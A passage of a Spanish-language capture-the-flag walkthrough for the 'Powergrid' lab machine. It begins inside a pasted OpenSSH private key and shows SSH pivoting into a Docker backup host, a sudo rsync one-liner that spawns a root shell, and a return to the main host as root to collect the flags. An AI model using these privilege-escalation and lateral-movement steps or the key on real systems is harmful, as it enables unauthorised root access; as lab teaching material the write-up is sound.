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
-----END OPENSSH PRIVATE KEY-----" > ssh.key

Le damos permisos.


p48@powergrid:~$ chmod 600 ssh.key

Miramos la informacion que tenemos de la red.


p48@powergrid:~$ ip addr show
ip addr show
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group 
default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0:  mtu 1500 qdisc pfifo_fast state UP 
group default qlen 1000
    link/ether 08:00:27:db:94:d2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.62/24 brd 192.168.1.255 scope global dynamic eth0
       valid_lft 84153sec preferred_lft 84153sec
    inet6 2a01:c50e:21e3:0:a00:27ff:fedb:94d2/64 scope global dynamic 
mngtmpaddr 
       valid_lft 1773sec preferred_lft 573sec
    inet6 fe80::a00:27ff:fedb:94d2/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0:  mtu 1500 qdisc noqueue state UP 
group default 
    link/ether 02:42:1e:c8:e0:9c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:1eff:fec8:e09c/64 scope link 
       valid_lft forever preferred_lft forever

Vemos que tenemos la interfaz 3 llamada docker0 y que tiene la IP 172.17.0.1. En el email aparecia que tenian un server de backup en la misma red asi que hacemos ping a la siguiente IP de ese rango para ver si encontramos el server de backup...


p48@powergrid:~$ ping 172.17.0.2 -c 1
ping 172.17.0.2 -c 1
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.061 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.061/0.061/0.061/0.000 ms

Vemos que la IP 172.17.0.2 responde. Usamos la key para loguearnos en el server de backup.


p48@powergrid:~$ ssh p48@172.17.0.2 -i ssh.key
ssh p48@172.17.0.2 -i ssh.key
Linux ef117d7a978f 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 20 00:22:30 2020 from 172.17.0.1
p48@ef117d7a978f:~$


p48@ef117d7a978f:~$ cat flag2.txt
cat flag2.txt
047ddcd1f33dfb7d80da3ce04e89df73

Well done for getting flag 2. It looks like this user is fairly unprivileged.

Miramos si podemos hacer algo con sudo.


p48@ef117d7a978f:~$ sudo -l
sudo -l
Matching Defaults entries for p48 on ef117d7a978f:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User p48 may run the following commands on ef117d7a978f:
    (root) NOPASSWD: /usr/bin/rsync

Podemos untilizar rsync, el cual nos puede proporcionar una shell de root :)


p48@ef117d7a978f:~$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
# id
uid=0(root) gid=0(root) groups=0(root)

Investigamos el sistema.

flag3.txt


# cd /root
# ls -la
total 36
drwx------ 1 root root 4096 May 19 23:57 .
drwxr-xr-x 1 root root 4096 May 19 18:13 ..
lrwxrwxrwx 1 root root    9 May 19 18:33 .bash_history -> /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwx------ 2 root root 4096 May 19 19:00 .ssh
-rw------- 1 root root 8115 May 19 23:57 .viminfo
-rw-r--r-- 1 root root  112 May 19 23:57 flag3.txt
# cat flag3.txt
009a4ddf6cbdd781c3513da0f77aa6a2

Well done for getting the third flag. Are you any good at pivoting backwards?

En el mail decia que el root del servidor de backup tenia acceso al servidor principal, asi que nos conectamos por ssh como root al sistema principal de nuevo....

Privilege Escalation


# ssh root@172.17.0.1
Linux powergrid 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 18:15:49 2020
root@powergrid:~#

flag4.txt


root@powergrid:~# cd /root
cd /root
root@powergrid:~# ls -la
ls -la
total 72
drwx------  7 root root  4096 May 26 18:15  .
drwxr-xr-x 18 root root  4096 May 19 17:42  ..
lrwxrwxrwx  1 root root     9 May 19 18:17  .bash_history -> /dev/null
-rw-r--r--  1 root root   570 Jan 31  2010  .bashrc
drwxr-xr-x  4 root root  4096 May 19 18:28  .cache
-rwx--x--x  1 root root    85 May 20 08:23  chown.sh
-rw-r--r--  1 root root   472 May 20 08:25  flag4.txt
drwx------  5 root root  4096 May 19 20:16  .gnupg
drwxr-xr-x  3 root root  4096 May 20 01:24  .local
-rwxr-xr-x  1 root root   494 May 20 00:49  malware.php
-rw-r--r--  1 root root   148 Aug 17  2015  .profile
-rw-r--r--  1 root root    74 May 19 20:36  .selected_editor
drwx------  2 root root  4096 May 19 20:00  .ssh
drwxr-xr-x  2 root root  4096 May 19 19:35  .vim
-rw-------  1 root root 11142 May 26 18:12  .viminfo
-rw-------  1 root root    55 May 19 18:24  .Xauthority
-rw-r--r--  1 root root  1220 May 26 18:15 'ystemctl status docker'

root@powergrid:~# cat flag4.txt
f5afaf46ede1dd5de76eac1876c60130

Congratulations. This is the fourth and final flag. Make sure to delete 
/var/www/html/startTime.txt to stop the attack (you will need to run chattr -i 
/var/www/html/startTime.txt first).

 _._     _,-'""`-._
(,-.`._,'(       |\`-/|
    `-.-' \ )-`( , o o)
          `-    \`_`"'-

This CTF was created by Thomas Williams - https://security.caerdydd.wales

Please visit my blog and provide feedback - I will be glad to hear your 
comments.
root@powergrid:~#

End

Y con esto ya seriamos root de la maquina : [1] https://www.exploit-db.com/exploits/40892